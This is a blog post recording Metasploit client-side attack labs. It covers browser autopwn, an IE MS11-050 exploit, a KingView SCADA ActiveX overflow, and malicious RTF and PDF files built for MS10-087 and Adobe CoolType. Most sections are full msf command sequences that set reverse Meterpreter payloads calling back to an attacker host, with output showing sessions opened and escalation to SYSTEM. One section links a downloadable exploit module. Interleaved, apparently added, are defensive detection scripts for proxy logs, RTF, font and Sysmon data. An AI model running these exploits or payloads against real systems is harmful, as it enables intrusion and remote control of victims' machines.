《Metasploit 魔鬼训练营》 06 Client-Side Exploitation
Source: Internet | Category: SQL injection attack toolkit | Editor: 程序博客网 | Time: 2024/04/28 16:55
This post records, step by step, the process of learning to use Metasploit on Kali Linux 2017.1. Contents:
1. Automated browser attacks in MSF
2. The MS11-050 vulnerability
3. KingView exploitation walkthrough
4. The MS10-087 vulnerability
5. Adobe Reader exploitation case study
1. Automated browser attacks in MSF
msf auxiliary(browser_autopwn2) > search browser_autopwn

Matching Modules
================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   auxiliary/server/browser_autopwn                     normal  HTTP Client Automatic Exploiter
   auxiliary/server/browser_autopwn2   2015-07-05       normal  HTTP Client Automatic Exploiter 2 (Browser Autopwn)

msf auxiliary(browser_autopwn2) > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

msf auxiliary(browser_autopwn) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf auxiliary(browser_autopwn) > set SRVHOST 10.10.10.128
SRVHOST => 10.10.10.128
msf auxiliary(browser_autopwn) > set URIPATH auto
URIPATH => auto
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
[*] Starting exploit modules on host 10.10.10.128...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/KEQN
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/DojeEicHhli
[*] Server started.

# After the target machine's browser visits http://10.10.10.128:8080/auto,
# go back and look at the msf output:
[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Request: /vZlLWxCXzIS/gbBUII/
[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Sending HTML...
[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Request: /vZlLWxCXzIS/gbBUII/wXWj.swf
[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Sending SWF...
[*] 10.10.10.254 wellintech_kingscada_kxclientdownload - Requested: /SzjZbOOOH/OMcEvw/
[*] 10.10.10.254 wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/hjZLLYcGnJhR
[*] Server started.
[*] 10.10.10.254 ms14_064_ole_code_execution - Sending exploit...
[*] 10.10.10.254 ms14_064_ole_code_execution - Sending VBS stager
[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.254:1062) at 2017-09-20 02:02:34 -0400
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/VAMgZvloTyhw
[*] --- Done, found 20 exploit modules
[*] Using URL: http://10.10.10.128:8080/auto
[-] Auxiliary failed: Rex::RuntimeError The supplied resource '/auto' is already added.
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/http/server.rb:411:in `add_resource'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/http/server.rb:188:in `start_service'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/tcp_server.rb:49:in `exploit'
[-]   /usr/share/metasploit-framework/modules/auxiliary/server/browser_autopwn.rb:171:in `run'
[*] Cleaning up exploits...
[*] Server stopped.
2. The MS11-050 vulnerability
msf > search ms11_050

Matching Modules
================

   Name                                                     Disclosure Date  Rank    Description
   ----                                                     ---------------  ----    -----------
   exploit/windows/browser/ms11_050_mshtml_cobjectelement   2011-06-16       normal  MS11-050 IE mshtml!CObjectElement Use After Free

msf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_mshtml_cobjectelement) > info

       Name: MS11-050 IE mshtml!CObjectElement Use After Free
     Module: exploit/windows/browser/ms11_050_mshtml_cobjectelement
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2011-06-16

Provided by:
  d0c_s4vage
  sinn3r <sinn3r@metasploit.com>
  bannedit <bannedit@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Internet Explorer 7 on XP SP3
  2   Internet Explorer 7 on Windows Vista
  3   Internet Explorer 8 on XP SP3
  4   Internet Explorer 8 on Windows 7
  5   Debug Target (Crash)

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  OBFUSCATE  false            no        Enable JavaScript obfuscation
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL for incoming connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                     no        The URI to use for this exploit (default is random)

Payload information:
  Space: 500
  Avoid: 6 characters

Description:
  This module exploits a use-after-free vulnerability in Internet Explorer. The
  vulnerability occurs when an invalid <object> tag exists and other elements
  overlap/cover where the object tag should be when rendered (due to their
  styles/positioning). The mshtml!CObjectElement is then freed from memory because
  it is invalid. However, the mshtml!CDisplay object for the page continues to keep
  a reference to the freed <object> and attempts to call a function on it, leading
  to the use-after-free.

  Please note that for IE 8 targets, JRE (Java Runtime Environment) is required to
  bypass DEP (Data Execution Prevention).

References:
  https://cvedetails.com/cve/CVE-2011-1260/
  OSVDB (72950)
  https://technet.microsoft.com/en-us/library/security/MS11-050
  http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html

msf exploit(ms11_050_mshtml_cobjectelement) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(ms11_050_mshtml_cobjectelement) > show options

Module options (exploit/windows/browser/ms11_050_mshtml_cobjectelement):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   OBFUSCATE  false            no        Enable JavaScript obfuscation
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The local listener hostname
   LPORT     8080             yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms11_050_mshtml_cobjectelement) > set URIPATH ms11050
URIPATH => ms11050
msf exploit(ms11_050_mshtml_cobjectelement) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(ms11_050_mshtml_cobjectelement) > set LPORT 8443
msf exploit(ms11_050_mshtml_cobjectelement) > exploit
[*] Exploit running as background job.
[*] Started HTTP reverse handler on http://10.10.10.128:8443
[*] Using URL: http://0.0.0.0:8080/ms11050
msf exploit(ms11_050_mshtml_cobjectelement) > [*] Local IP: http://10.10.10.128:8080/ms11050
[*] Server started.

# After the target machine's browser visits http://10.10.10.128:8080/ms11050,
# go back and look at the msf output:
[*] 10.10.10.254 ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
[*] 10.10.10.254 ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
[*] 10.10.10.254 ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
3. KingView exploitation walkthrough
Reference: http://www.cnblogs.com/justforfun12/p/5324408.html
Module download link: http://pan.baidu.com/s/1geScJa7 (password: r9a5). Place the module file in the /usr/share/metasploit-framework/modules/exploits/windows/browser directory.

msf > search kingview

Matching Modules
================

   Name                                                          Disclosure Date  Rank    Description
   ----                                                          ---------------  ----    -----------
   exploit/windows/browser/kingview_SCADA_activeX_validateuser   2011-03-07       normal  KingView 6.5.3 KVWebSvr.dll ActiveX ValidateUser Buffer Overflow
   exploit/windows/fileformat/kingview_kingmess_kvl              2012-11-20       normal  KingView Log File Parsing Buffer Overflow
   exploit/windows/scada/KingView6.53overflow                                     good    Kingview 6.53 SCADA HMI HistorySvr Heap Overflow
   exploit/windows/scada/KingView6.53overflow                                     good    Kingview 6.53 SCADA HMI HistorySvr Heap Overflow

msf > use exploit/windows/browser/kingview_SCADA_activeX_validateuser
msf exploit(kingview_SCADA_activeX_validateuser) > show options

Module options (exploit/windows/browser/kingview_SCADA_activeX_validateuser):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                yes       The URI to use.

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(kingview_SCADA_activeX_validateuser) > set URIP
set URIPATH  set URIPORT
msf exploit(kingview_SCADA_activeX_validateuser) > set URIPATH kingview
URIPATH => kingview
msf exploit(kingview_SCADA_activeX_validateuser) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(kingview_SCADA_activeX_validateuser) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(kingview_SCADA_activeX_validateuser) > set SRVHOST 10.10.10.128
SRVHOST => 10.10.10.128
msf exploit(kingview_SCADA_activeX_validateuser) > set LPORT 8443
LPORT => 8443
msf exploit(kingview_SCADA_activeX_validateuser) > exploit
[*] Exploit running as background job.
[*] Started HTTP reverse handler on http://10.10.10.128:8443
[*] Using URL: http://10.10.10.128:8080/kingview
[*] Server started.

# After the target machine's browser visits http://10.10.10.128:8080/kingview,
# go back and look at the msf output:
[-] 10.10.10.254 kingview_SCADA_activeX_validateuser - Exception handling request: No encoders encoded the buffer successfully.
[*] 10.10.10.254 kingview_SCADA_activeX_validateuser - Sending KingView 6.5.3 KVWebSvr.dll ActiveX ValidateUser Buffer Overflow to 10.10.10.254:1045...
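Sections 1 to 3 all show the same pattern from the defender's side: a client fetches an HTML landing page from a bare IP on a non-standard port and, within seconds, receives plugin or script content (an SWF, an ActiveX control, a VBS stager) from that same origin. The following is an added example, not code from the original post or from Metasploit: a small heuristic over a constructed web-proxy log that flags a (client, origin) pair when an HTML page is followed within a short window by two or more different active-content kinds. The log format, the content-kind tables and the thresholds are assumptions chosen for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Constructed sample proxy log (not taken from the original post). One record per line:
#   <ISO timestamp> <client-ip> <method> <url> <status> <content-type>
# The first client mirrors what the msf output above shows being served: an HTML
# landing page, then a Flash .swf, then a VBS stager, all from one IP:port origin.
SAMPLE_LOG = """\
2017-09-20T02:02:10 10.10.10.254 GET http://10.10.10.128:8080/auto 200 text/html
2017-09-20T02:02:11 10.10.10.254 GET http://10.10.10.128:8080/vZlLWxCXzIS/gbBUII/ 200 text/html
2017-09-20T02:02:12 10.10.10.254 GET http://10.10.10.128:8080/vZlLWxCXzIS/gbBUII/wXWj.swf 200 application/x-shockwave-flash
2017-09-20T02:02:14 10.10.10.254 GET http://10.10.10.128:8080/SzjZbOOOH/OMcEvw/ 200 text/html
2017-09-20T02:02:20 10.10.10.254 GET http://10.10.10.128:8080/hjZLLYcGnJhR/stager.vbs 200 text/vbscript
2017-09-20T02:05:00 10.10.10.77 GET http://intranet.example.test/index.html 200 text/html
2017-09-20T02:05:01 10.10.10.77 GET http://intranet.example.test/app.js 200 application/javascript
2017-09-20T02:05:02 10.10.10.77 GET http://intranet.example.test/logo.png 200 image/png
"""

# Content kinds that browser exploit servers typically hand to a plugin or script host
# (assumed tables for this example; extend them to match your own environment).
ACTIVE_EXTENSIONS = {".swf": "flash", ".ocx": "activex", ".cab": "activex",
                     ".vbs": "vbscript", ".jar": "java", ".pdf": "pdf"}
ACTIVE_CONTENT_TYPES = {"application/x-shockwave-flash": "flash", "text/vbscript": "vbscript",
                        "application/java-archive": "java", "application/pdf": "pdf"}
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def parse_line(line):
    """Split one constructed log record into a dict; the timestamp becomes a datetime."""
    ts, client, method, url, status, ctype = line.split()
    return {"ts": datetime.fromisoformat(ts), "client": client, "method": method,
            "url": url, "status": int(status), "ctype": ctype.split(";")[0].lower()}


def active_kind(rec):
    """Return the active-content kind of a record, or None for ordinary web content."""
    path = urlparse(rec["url"]).path.lower()
    for ext, kind in ACTIVE_EXTENSIONS.items():
        if path.endswith(ext):
            return kind
    return ACTIVE_CONTENT_TYPES.get(rec["ctype"])


def bare_ip_on_nonstandard_port(netloc):
    """True when the origin is a literal IPv4 address served on a port other than 80/443."""
    u = urlparse("http://" + netloc)
    return bool(IPV4_RE.fullmatch(u.hostname or "")) and u.port not in (None, 80, 443)


def find_driveby_candidates(log_text, window_seconds=60, min_kinds=2):
    """Flag (client, origin) pairs where an HTML page is followed within the window
    by at least `min_kinds` different active-content kinds from the same origin."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            groups[(rec["client"], urlparse(rec["url"]).netloc)].append(rec)

    findings = []
    for (client, origin), recs in groups.items():
        recs.sort(key=lambda r: r["ts"])
        for i, landing in enumerate(recs):
            if not landing["ctype"].startswith("text/html"):
                continue
            kinds = set()
            for later in recs[i + 1:]:
                if (later["ts"] - landing["ts"]).total_seconds() > window_seconds:
                    break
                kind = active_kind(later)
                if kind:
                    kinds.add(kind)
            if len(kinds) >= min_kinds:
                findings.append({"client": client, "origin": origin,
                                 "landing_page": landing["url"],
                                 "kinds": sorted(kinds),
                                 "bare_ip_nonstandard_port": bare_ip_on_nonstandard_port(origin)})
                break  # one finding per client/origin pair is enough for triage
    return findings


if __name__ == "__main__":
    for finding in find_driveby_candidates(SAMPLE_LOG):
        print(finding)
```

On the sample log the first client is flagged with kinds ["flash", "vbscript"] from 10.10.10.128:8080, a bare IP on a non-standard port, while the intranet client fetching a script and an image is not. The heuristic is deliberately coarse: it is a triage filter to surface hosts worth examining, and the bare-IP indicator is only a supporting signal, since legitimate internal services are also reached by address.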
4. The MS10-087 vulnerability
# First generate the malicious document
msf > search ms10_087

Matching Modules
================

   Name                                                    Disclosure Date  Rank   Description
   ----                                                    ---------------  ----   -----------
   exploit/windows/fileformat/ms10_087_rtf_pfragments_bof  2010-11-09       great  MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)

msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(ms10_087_rtf_pfragments_bof) > show options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rtf          yes       The file name.

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec
payload => windows/exec
msf exploit(ms10_087_rtf_pfragments_bof) > set CMD calc.exe
CMD => calc.exe
msf exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
FILENAME => ms10087.rtf
msf exploit(ms10_087_rtf_pfragments_bof) > exploit
[*] Creating 'ms10087.rtf' file ...
[+] ms10087.rtf stored at /root/.msf4/local/ms10087.rtf

# Copy the generated file /root/.msf4/local/ms10087.rtf to the target machine and open it.
# A calculator pops up: the attack succeeded.
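The module name says what to look for when triaging a document like the one generated above: a shape property named pFragments whose \sv value is far longer than any legitimate fragment list. The following is an added example, not code from the original post or from Metasploit: a triage check that scans an RTF file for pFragments properties, measures the length of each \sv value and returns a verdict. The two sample documents and the 64-character length threshold are constructed for the example.

```python
import re

# Constructed sample documents (not from the original post). The second one carries a
# pFragments shape property with an oversized \sv value, the shape MS10-087 abuses.
SAMPLE_BENIGN = r"{\rtf1\ansi{\fonttbl{\f0 Arial;}}\f0 Hello from a plain document.\par}"
SAMPLE_SUSPECT = (r"{\rtf1\ansi{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1;"
                  + "11" * 600 + r"}}}}\par}")

# A property group looks like {\sp{\sn <name>}{\sv <value>}}; capture the value that
# directly follows a pFragments name.
PFRAGMENTS_RE = re.compile(r"\\sn\s+pFragments\s*\}\s*\{\s*\\sv\s+([^{}]*)", re.IGNORECASE)


def triage_rtf(data: bytes, max_sv_len: int = 64) -> dict:
    """Return a triage record: whether the blob is RTF, every pFragments property found
    (offset and \\sv value length), and a verdict of not-rtf / clean / review / suspicious."""
    # RTF is 7-bit ASCII with escapes; latin-1 maps every byte one-to-one so offsets stay exact.
    text = data.decode("latin-1")
    result = {"is_rtf": text.lstrip().startswith("{\\rtf"), "pfragments": [], "verdict": "clean"}
    if not result["is_rtf"]:
        result["verdict"] = "not-rtf"
        return result

    for match in PFRAGMENTS_RE.finditer(text):
        value = match.group(1).strip()
        result["pfragments"].append({"offset": match.start(), "sv_len": len(value)})

    if any(p["sv_len"] > max_sv_len for p in result["pfragments"]):
        result["verdict"] = "suspicious"   # value far beyond a plausible fragment list
    elif result["pfragments"]:
        result["verdict"] = "review"       # property present; unusual in ordinary documents
    return result


if __name__ == "__main__":
    print(triage_rtf(SAMPLE_BENIGN.encode("ascii")))
    print(triage_rtf(SAMPLE_SUSPECT.encode("ascii")))
```

The check is intentionally a triage filter rather than an RTF parser: Word tolerates control words split across groups and other obfuscation that a regular expression will not see, so a "clean" result means only that this particular shape was not found in plain form. A "review" verdict for any pFragments property at all is reasonable in environments where documents never carry drawing shapes.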
5. Adobe Reader exploitation case study
# Configure the test module and generate the file
msf > search adobe_cool

Matching Modules
================

   Name                                           Disclosure Date  Rank   Description
   ----                                           ---------------  ----   -----------
   exploit/windows/browser/adobe_cooltype_sing    2010-09-07       great  Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
   exploit/windows/fileformat/adobe_cooltype_sing 2010-09-07       great  Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow

msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(adobe_cooltype_sing) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(adobe_cooltype_sing) > set LPORT 8443
LPORT => 8443
msf exploit(adobe_cooltype_sing) > set FILENAME 2.pdf
FILENAME => 2.pdf
msf exploit(adobe_cooltype_sing) > run
[*] Creating '2.pdf' file...
[+] 2.pdf stored at /root/.msf4/local/2.pdf

# Copy the file to the target machine.
# Start the listener:
msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.10.128     yes       The local listener hostname
   LPORT     8080             yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit
[*] Started HTTP reverse handler on http://10.10.10.128:8080

# After the target machine opens the file, msf shows:
[*] http://10.10.10.128:8443 handling request from 10.10.10.254; (UUID: duvbthou) Staging x86 payload (958035 bytes) ...
[*] Meterpreter session 1 opened (10.10.10.128:8443 -> 10.10.10.254:1048) at 2017-09-20 11:08:55 -0400
[*] Session ID 1 (10.10.10.128:8443 -> 10.10.10.254:1048) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is acrord32.exe (2136) as: DH-CA8822AB9589\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (716)
[+] Successfully migrated to services.exe (716) as: NT AUTHORITY\SYSTEM
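The module name above points at the field a defender can check in a suspect PDF's embedded fonts: the SING table's uniqueName, a 28-byte field that CoolType copied as a C string, so a name with no NUL inside those 28 bytes is the condition the parser mishandled. The following is an added example, not code from the original post or from Metasploit: a parser for the sfnt table directory that locates the SING table and reports whether uniqueName is NUL-terminated. It assumes the font stream has already been extracted and decompressed from the PDF (FontFile2/FontFile3 objects), which the example does not do; the sfnt and SING builders are constructed helpers used only to produce sample input.

```python
import struct

SFNT_VERSIONS = {0x00010000, 0x4F54544F, 0x74727565}  # TrueType 1.0, 'OTTO' (CFF), 'true'
SING_UNIQUE_NAME_OFFSET = 16   # eight 16-bit fields precede uniqueName in the SING table
SING_UNIQUE_NAME_SIZE = 28


def build_sing_table(unique_name: bytes) -> bytes:
    """Constructed SING table for the example: the 16-byte fixed header, the 28-byte
    uniqueName, a zeroed 16-byte METAMD5 and a zero nameLength."""
    header = struct.pack(">7Hh", 1, 0, 1, 0, 0, 1000, 0, 0)
    name = unique_name[:SING_UNIQUE_NAME_SIZE].ljust(SING_UNIQUE_NAME_SIZE, b"\0")
    return header + name + b"\0" * 16 + b"\0"


def build_sfnt(tables: dict) -> bytes:
    """Constructed minimal sfnt container: header, table directory, then table data.
    Checksums are left at zero, which is enough for a parser that only locates tables."""
    directory_size = 12 + 16 * len(tables)
    records, body, offset = b"", b"", directory_size
    for tag, data in tables.items():
        padded = data + b"\0" * ((4 - len(data) % 4) % 4)   # tables are 4-byte aligned
        records += struct.pack(">4sIII", tag.encode("ascii"), 0, offset, len(data))
        body += padded
        offset += len(padded)
    header = struct.pack(">IHHHH", 0x4F54544F, len(tables), 0, 0, 0)
    return header + records + body


def check_sing_unique_name(font: bytes) -> dict:
    """Locate the SING table and report whether uniqueName carries a NUL inside its
    28-byte field. Every offset is bounds-checked against the blob before slicing."""
    if len(font) < 12:
        return {"verdict": "not-sfnt"}
    version, num_tables = struct.unpack(">IH", font[:6])
    if version not in SFNT_VERSIONS:
        return {"verdict": "not-sfnt"}
    for i in range(num_tables):
        record = font[12 + 16 * i: 28 + 16 * i]
        if len(record) < 16:
            return {"verdict": "truncated-directory"}
        tag, _checksum, offset, length = struct.unpack(">4sIII", record)
        if tag != b"SING":
            continue
        end = SING_UNIQUE_NAME_OFFSET + SING_UNIQUE_NAME_SIZE
        if length < end or offset + end > len(font):
            return {"verdict": "truncated-sing"}
        name = font[offset + SING_UNIQUE_NAME_OFFSET: offset + end]
        terminated = b"\0" in name
        return {"verdict": "ok" if terminated else "suspicious",
                "unique_name_len": name.index(b"\0") if terminated else SING_UNIQUE_NAME_SIZE,
                "unique_name": name.split(b"\0", 1)[0]}
    return {"verdict": "no-sing-table"}


if __name__ == "__main__":
    benign = build_sfnt({"SING": build_sing_table(b"glyphlet-demo"), "cmap": b"\0" * 4})
    unterminated = build_sfnt({"SING": build_sing_table(b"A" * 40)})
    print(check_sing_unique_name(benign))
    print(check_sing_unique_name(unterminated))
```

A "suspicious" verdict does not by itself prove an exploit, since a sloppy font tool could emit an unterminated name, but SING tables are rare in documents to begin with, so any font carrying one deserves a look, and an unterminated uniqueName in a PDF received by e-mail is a strong signal.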
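The last lines of the session output show the step that matters most on the endpoint: the Meterpreter running inside acrord32.exe migrates into services.exe and becomes SYSTEM. Migration starts a thread in another process, which Sysmon records as Event ID 8 (CreateRemoteThread) with SourceImage and TargetImage. The following is an added example, not code from the original post or from Metasploit: a detection rule over constructed Sysmon-style records that raises an alert whenever a document or browser process starts a thread in another process, rated high when the target is a core system process. The process lists and the sample events are assumptions for the example.

```python
from pathlib import PureWindowsPath

# Processes that render attacker-supplied documents or web content. Code in one of these
# starting a thread in another process is what the msf "migrate" step looks like from
# the endpoint's side. (Assumed lists for this example.)
DOCUMENT_APPS = {"acrord32.exe", "winword.exe", "excel.exe", "powerpnt.exe",
                 "iexplore.exe", "firefox.exe", "chrome.exe"}
SYSTEM_PROCESSES = {"services.exe", "lsass.exe", "winlogon.exe", "wininit.exe",
                    "csrss.exe", "svchost.exe"}

# Constructed Sysmon-style records (Event ID 8 = CreateRemoteThread). Field names follow
# Sysmon's; the first record mirrors the migration shown in the session output above.
SAMPLE_EVENTS = [
    {"EventID": 8, "UtcTime": "2017-09-20 15:08:56",
     "SourceImage": r"C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe", "SourceProcessId": 2136,
     "TargetImage": r"C:\Windows\System32\services.exe", "TargetProcessId": 716},
    {"EventID": 8, "UtcTime": "2017-09-20 15:10:02",
     "SourceImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", "SourceProcessId": 3104,
     "TargetImage": r"C:\Windows\System32\notepad.exe", "TargetProcessId": 3320},
    {"EventID": 8, "UtcTime": "2017-09-20 15:11:40",
     "SourceImage": r"C:\Windows\System32\csrss.exe", "SourceProcessId": 420,
     "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 1620},
    {"EventID": 1, "UtcTime": "2017-09-20 15:12:00",
     "Image": r"C:\Windows\System32\cmd.exe", "ProcessId": 3400},
]


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for set lookups."""
    return PureWindowsPath(path).name.lower()


def detect_migration(events):
    """Return one alert per CreateRemoteThread event whose source is a document or
    browser process. Targets in SYSTEM_PROCESSES are rated high: a successful migration
    there yields SYSTEM, as the session output above shows for services.exe."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 8:
            continue
        src, dst = image_name(ev["SourceImage"]), image_name(ev["TargetImage"])
        if src not in DOCUMENT_APPS:
            continue
        alerts.append({"time": ev["UtcTime"],
                       "source": src, "source_pid": ev["SourceProcessId"],
                       "target": dst, "target_pid": ev["TargetProcessId"],
                       "severity": "high" if dst in SYSTEM_PROCESSES else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in detect_migration(SAMPLE_EVENTS):
        print(alert)
```

The rule keys on the source process rather than the injection technique, so it also catches migration into non-system targets such as the Word-to-notepad record, at medium severity. Complement it with the reverse_http side of the same session: a reader or office process that opens an outbound HTTP connection to a bare IP, as 10.10.10.254 does to 10.10.10.128:8443 above, is the earlier signal, and Sysmon Event ID 3 (NetworkConnect) carries the image name needed to write that check the same way.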